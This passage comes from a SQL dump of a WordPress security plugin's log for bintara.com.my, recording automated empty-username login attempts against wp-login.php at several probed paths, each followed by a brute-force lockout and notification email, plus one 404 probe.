empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c0a498530462bc0e8ac9698f858b2d3f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBREnlR@6WyRVzpiDsoQAAAA0\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.158.15.146\";s:11:\"REMOTE_PORT\";s:5:\"34802\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBREnlR@6WyRVzpiDsoQAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569079621.054\";s:12:\"REQUEST_TIME\";s:10:\"1569079621\";}}','notice','2019-09-21 15:27:02','2019-09-21 15:27:01',27563840,29116016,'https://bintara.com.my/wp/wp-login.php',1,0,'192.158.15.146'),(26649,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:27:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:27:01\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:27:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:27:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:27:02','2019-09-21 15:27:01',27645448,29116016,'https://bintara.com.my/wp/wp-login.php',1,0,'192.158.15.146'),(26650,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:27:02','2019-09-21 15:27:01',28006344,29116016,'https://bintara.com.my/wp/wp-login.php',1,0,'192.158.15.146'),(26651,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=5a713f09e66749abce980b56bcc85c0e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBXknlR@6WyRVzpiDsvQAAABQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.163.199\";s:11:\"REMOTE_PORT\";s:5:\"41136\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBXknlR@6WyRVzpiDsvQAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079647.0672\";s:12:\"REQUEST_TIME\";s:10:\"1569079647\";}}','notice','2019-09-21 15:27:29','2019-09-21 15:27:27',27569648,29122472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.163.199'),(26652,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:27:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:27:27\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:27:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:27:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:27:29','2019-09-21 15:27:27',27651240,29122472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.163.199'),(26653,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:27:29','2019-09-21 15:27:27',28012200,29122472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.163.199'),(26654,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b813ae9f2017949cf5a45c2bce5f3aab\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBfDDrcQxTmGrCWuaXewAAAcI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"35030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBfDDrcQxTmGrCWuaXewAAAcI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079676.2458\";s:12:\"REQUEST_TIME\";s:10:\"1569079676\";}}','notice','2019-09-21 15:27:58','2019-09-21 15:27:56',27566864,29116712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'82.202.249.38'),(26655,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:27:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:27:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:27:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:27:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:27:58','2019-09-21 15:27:56',27648368,29116712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'82.202.249.38'),(26656,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:27:58','2019-09-21 15:27:56',28009104,29116712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'82.202.249.38'),(26657,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=dc9fdd2647bbca4d9784bdd41d3b2ae7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBkEnlR@6WyRVzpiDs9AAAABE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"148.66.145.133\";s:11:\"REMOTE_PORT\";s:5:\"44322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBkEnlR@6WyRVzpiDs9AAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079696.9728\";s:12:\"REQUEST_TIME\";s:10:\"1569079696\";}}','notice','2019-09-21 15:28:19','2019-09-21 15:28:17',27568832,29122232,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.145.133'),(26658,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:28:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:28:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:28:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:28:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:28:19','2019-09-21 15:28:17',27650336,29122232,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.145.133'),(26659,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:28:19','2019-09-21 15:28:17',28011224,29122232,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.145.133'),(26660,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=bcd3da4e99b4d3646de98dcc14f046f5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBlUnlR@6WyRVzpiDs@wAAAA0\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"53124\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBlUnlR@6WyRVzpiDs@wAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079701.8076\";s:12:\"REQUEST_TIME\";s:10:\"1569079701\";}}','notice','2019-09-21 15:28:24','2019-09-21 15:28:22',27568016,29119496,'https://bintara.com.my/2019/wp-login.php',1,0,'177.36.8.226'),(26661,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:28:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:28:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:28:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:28:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:28:24','2019-09-21 15:28:22',27649672,29119496,'https://bintara.com.my/2019/wp-login.php',1,0,'177.36.8.226'),(26662,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:28:24','2019-09-21 15:28:22',28010360,29119496,'https://bintara.com.my/2019/wp-login.php',1,0,'177.36.8.226'),(26663,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/util/login.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dc9a2fb6cfed903664772edb9cb482e0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/util/login.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/util/login.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZBoUnlR@6WyRVzpiDtCQAAAAk\";s:12:\"REDIRECT_URL\";s:16:\"/util/login.aspx\";s:11:\"REMOTE_ADDR\";s:11:\"34.76.24.54\";s:11:\"REMOTE_PORT\";s:5:\"36454\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/util/login.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/util/login.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZBoUnlR@6WyRVzpiDtCQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079713.2409\";s:12:\"REQUEST_TIME\";s:10:\"1569079713\";}}','notice','2019-09-21 15:28:36','2019-09-21 15:28:33',27234664,29059432,'https://bintara.com.my/util/login.aspx',1,0,'34.76.24.54'),(26664,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 